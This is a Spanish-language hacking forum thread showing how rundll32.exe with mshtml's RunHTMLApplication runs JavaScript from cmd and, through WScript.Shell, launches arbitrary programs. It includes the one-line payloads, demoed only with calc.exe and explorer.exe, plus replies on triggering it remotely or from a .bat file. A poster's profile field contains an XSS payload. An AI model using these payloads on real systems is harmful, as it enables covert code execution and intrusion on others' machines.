Usando Javascript para ejecutar tareas en Windows [cmd]

  • 4 Respuestas
  • 14993 Vistas

0 Usuarios y 2 Visitantes están viendo este tema.

Desconectado Jimeno

  • *
  • Ex-Staff
  • *****
  • Mensajes: 367
  • Actividad:
    0%
  • Reputación -1
  • NULL
  • Skype: migueljimeno96
  • Twitter: "><<img src=y onerror=prompt();>
    • Ver Perfil
    • Twitter
¡Buenas a todos! El post explica cómo ejecutar tareas en Windows desde cmd mediante código Javascript. Por ahora lo he probado en Windows 8 y en Windows 7, en ambos funciona.
Quiero dejar constanza de que el payload inicial NO es mío, sino que lo vi por Twitter y me puse a probar cosas nuevas.

Necesitaremos:
  • Un Windows
  • Conocimientos básicos de Javascript
1. Abrimos nuestro cmd y ejecutamos nuestro rundll32.exe ubicado en C:\Windows\System32
2. Una vez ahí lanzamos nuestro payload de prueba con un alert y nuestro nick:
Código: You are not allowed to view links. Register or Login
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert("Jimeno")Así obtendremos un resultado como este:


Podemos ejecutar tanto alerts como prompts como cualquier otra cosa:


Pero... ¿y si vamos más allá? ¿Y si decidimos ejecutar un programa cualquiera? ¿Se podrá? La respuesta es SÍ.
Para esta demo decidí utilizar dos programas inofensivos: "calc.exe" --> la calculadora de Windows y "explorer.exe" --> el explorador de archivos.
Eso sí, ahora nuestro payload se complica bastante, quedaría así:
Código: You are not allowed to view links. Register or Login
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=javascript>"+(new%20ActiveXObject("WScript.Shell")).Run("calc.exe")+"\74/script>")


Para ejecutar cualquier otro programa solo necesitamos escribir su ruta:



Esto es todo, ahora solo necesitan dejar jugar a su imaginación.

¡Saludos!
Contacto: @migueljimeno96 -

Desconectado visior

  • *
  • Underc0der
  • Mensajes: 15
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
Muy buen aporte,  hay alguna forma de no tener que abrir manualmente la cmd?  Esa es la clave. Podríamos buscar algún exploit. Suerte!!!
La mayor de las vulnerabilidades y la más difícil de parchear es la humana.

Desconectado Jimeno

  • *
  • Ex-Staff
  • *****
  • Mensajes: 367
  • Actividad:
    0%
  • Reputación -1
  • NULL
  • Skype: migueljimeno96
  • Twitter: "><<img src=y onerror=prompt();>
    • Ver Perfil
    • Twitter
You are not allowed to view links. Register or Login
Muy buen aporte,  hay alguna forma de no tener que abrir manualmente la cmd?  Esa es la clave. Podríamos buscar algún exploit. Suerte!!!
Haciendo que un .bat lo ejecute, por ejemplo.
Contacto: @migueljimeno96 -

Desconectado visior

  • *
  • Underc0der
  • Mensajes: 15
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
Me refiero desde el mismo Javascript ya que  de esta forma se podría hacer un ataque remoto
La mayor de las vulnerabilidades y la más difícil de parchear es la humana.

Desconectado syskc0

  • *
  • Underc0der
  • Mensajes: 39
  • Actividad:
    0%
  • Reputación 0
  • Hello Word !!
    • Ver Perfil
    • Email
imposible ya que el javascript se ejcuta en el navegador no en la consola..
el mundo es una variable facil inicias facil terminas

=_=

 

[Phishing] Página de phishing para Twitter

Iniciado por bernatixer

Respuestas: 8
Vistas: 8191
Último mensaje Enero 07, 2016, 10:23:35 am
por ANTRAX
Eternal - Un escáner para Eternal Blue

Iniciado por puntoCL

Respuestas: 2
Vistas: 4292
Último mensaje Julio 23, 2017, 10:37:05 pm
por puntoCL
Paso a paso para ser un verdadero < HACKER > lo mejor que hay

Iniciado por smown

Respuestas: 5
Vistas: 6120
Último mensaje Agosto 17, 2018, 09:20:02 am
por ANTRAX
Un Redirect en Facebook para hacer Phishing a Facebook

Iniciado por Stiuvert

Respuestas: 4
Vistas: 7395
Último mensaje Enero 09, 2014, 11:46:26 pm
por Snifer
Conocimientos importantes para "empezar" en la seguridad informática.

Iniciado por Bael

Respuestas: 43
Vistas: 55297
Último mensaje Abril 28, 2020, 06:00:09 pm
por Damian Cosmo